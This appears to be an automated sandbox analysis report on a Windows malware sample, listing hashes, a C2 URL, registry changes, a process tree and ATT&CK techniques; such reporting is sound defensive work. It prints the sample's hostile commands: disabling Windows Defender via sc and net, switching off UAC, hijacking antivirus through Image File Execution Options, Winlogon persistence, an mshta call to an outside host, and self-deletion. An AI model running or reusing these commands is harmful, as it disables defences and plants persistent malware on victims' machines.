Analysis
-
max time kernel
150s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
23/08/2024, 07:17
Static task
static1
Behavioral task
behavioral1
Sample
bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
-
Size
2.2MB
-
MD5
bace3b705692dd51098d62cfab3e4c7a
-
SHA1
709c80482b025237a006bb84101cfa3d1327c0e9
-
SHA256
0f8478e87936627ba79b070ef5e433348b2b490f41409004651bf8127b197ff3
-
SHA512
429b74ba446fff14365e57648b485d1513a69858fdd5627335a232fdffd76f2af122cc023a8b0eaf456a658fc2b605b920049bac2264af34ee724c3131aa4749
-
SSDEEP
49152:CMGZ+nS10IELGTCb6bweJKFbC8PX8lD6qo9jTdpA4GkxDC:CySeIELGGbc0FbxI+q6TdpA4xpC
Malware Config
Extracted
http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=PSBQWFYT&2=i-s&3=225&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\ynqonw.exe" ynqonw.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ynqonw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ynqonw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" ynqonw.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" ynqonw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" ynqonw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" ynqonw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe ynqonw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe ynqonw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" ynqonw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe ynqonw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe ynqonw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe ynqonw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" ynqonw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe ynqonw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe ynqonw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" ynqonw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe ynqonw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" ynqonw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" ynqonw.exe -
Deletes itself 1 IoCs
pid Process 2108 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2548 ynqonw.exe -
Loads dropped DLL 2 IoCs
pid Process 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ynqonw.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2740 sc.exe 2140 sc.exe 2892 sc.exe 1424 sc.exe 2188 sc.exe 2384 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ynqonw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2548 ynqonw.exe Token: SeShutdownPrivilege 2548 ynqonw.exe Token: SeDebugPrivilege 2548 ynqonw.exe Token: SeShutdownPrivilege 2548 ynqonw.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe 2548 ynqonw.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2748 wrote to memory of 2740 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 31 PID 2748 wrote to memory of 2740 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 31 PID 2748 wrote to memory of 2740 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 31 PID 2748 wrote to memory of 2740 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 31 PID 2748 wrote to memory of 2140 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 32 PID 2748 wrote to memory of 2140 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 32 PID 2748 wrote to memory of 2140 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 32 PID 2748 wrote to memory of 2140 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 32 PID 2748 wrote to memory of 2860 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 34 PID 2748 wrote to memory of 2860 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 34 PID 2748 wrote to memory of 2860 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 34 PID 2748 wrote to memory of 2860 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 34 PID 2748 wrote to memory of 2892 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 35 PID 2748 wrote to memory of 2892 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 35 PID 2748 wrote to memory of 2892 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 35 PID 2748 wrote to memory of 2892 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 35 PID 2748 wrote to memory of 2548 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 39 PID 2748 wrote to memory of 2548 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 39 PID 2748 wrote to memory of 2548 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 39 PID 2748 wrote to memory of 2548 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 39 PID 2860 wrote to memory of 2604 2860 net.exe 40 PID 2860 wrote to memory of 2604 2860 net.exe 40 PID 2860 wrote to memory of 2604 2860 net.exe 40 PID 2860 wrote to memory of 2604 2860 net.exe 40 PID 2748 wrote to memory of 2108 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 41 PID 2748 wrote to memory of 2108 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 41 PID 2748 wrote to memory of 2108 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 41 PID 2748 wrote to memory of 2108 2748 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 41 PID 2548 wrote to memory of 1424 2548 ynqonw.exe 43 PID 2548 wrote to memory of 1424 2548 ynqonw.exe 43 PID 2548 wrote to memory of 1424 2548 ynqonw.exe 43 PID 2548 wrote to memory of 1424 2548 ynqonw.exe 43 PID 2548 wrote to memory of 2384 2548 ynqonw.exe 44 PID 2548 wrote to memory of 2384 2548 ynqonw.exe 44 PID 2548 wrote to memory of 2384 2548 ynqonw.exe 44 PID 2548 wrote to memory of 2384 2548 ynqonw.exe 44 PID 2548 wrote to memory of 2404 2548 ynqonw.exe 46 PID 2548 wrote to memory of 2404 2548 ynqonw.exe 46 PID 2548 wrote to memory of 2404 2548 ynqonw.exe 46 PID 2548 wrote to memory of 2404 2548 ynqonw.exe 46 PID 2548 wrote to memory of 2188 2548 ynqonw.exe 48 PID 2548 wrote to memory of 2188 2548 ynqonw.exe 48 PID 2548 wrote to memory of 2188 2548 ynqonw.exe 48 PID 2548 wrote to memory of 2188 2548 ynqonw.exe 48 PID 2404 wrote to memory of 2732 2404 net.exe 52 PID 2404 wrote to memory of 2732 2404 net.exe 52 PID 2404 wrote to memory of 2732 2404 net.exe 52 PID 2404 wrote to memory of 2732 2404 net.exe 52 PID 2548 wrote to memory of 2864 2548 ynqonw.exe 51 PID 2548 wrote to memory of 2864 2548 ynqonw.exe 51 PID 2548 wrote to memory of 2864 2548 ynqonw.exe 51 PID 2548 wrote to memory of 2864 2548 ynqonw.exe 51 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ynqonw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ynqonw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ynqonw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" ynqonw.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2740
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2140
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:2604
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2892
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\ynqonw.exeC:\Users\Admin\AppData\Roaming\Microsoft\ynqonw.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2548 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1424
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2384
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=PSBQWFYT&2=i-s&3=225&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\BACE3B~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2108
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5bace3b705692dd51098d62cfab3e4c7a
SHA1709c80482b025237a006bb84101cfa3d1327c0e9
SHA2560f8478e87936627ba79b070ef5e433348b2b490f41409004651bf8127b197ff3
SHA512429b74ba446fff14365e57648b485d1513a69858fdd5627335a232fdffd76f2af122cc023a8b0eaf456a658fc2b605b920049bac2264af34ee724c3131aa4749